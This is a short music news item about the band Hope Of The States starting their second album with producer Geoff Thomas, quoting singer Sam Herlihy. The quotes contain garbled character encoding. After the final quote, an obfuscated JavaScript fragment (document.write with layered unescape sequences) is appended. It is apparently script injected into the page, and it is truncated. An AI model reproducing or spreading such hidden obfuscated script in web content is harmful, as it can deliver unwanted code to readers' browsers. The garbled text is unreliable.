Hope Of The States have started work on their second album in a secret countryside studio.
The band began the first stage of recording two weeks ago with producer Geoff Thomas, who collaborated with the group on their 2004 debut ‘The Lost Riots'.
Singer Sam Herlihy told NME.COM: “We're just pulling everything apart and wiring together old machines and stuff.â€
Talking about the sound of the new LP, he explained: “I think it sounds pretty different. A lot of the stuff is a lot more up â€" we're just kind of trying to carry on our grand scheme to shrink everything down the whole time. We're spending more time experimenting with sounds.â€
Herlihy said fans can expect the as-yet-untitled album this year. He added: “I think it will be a bit of a surprise. This album is more about getting really strong songs to start off with as opposed to covering stuff up with that apocalyptic sound we did on the first record.â€document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
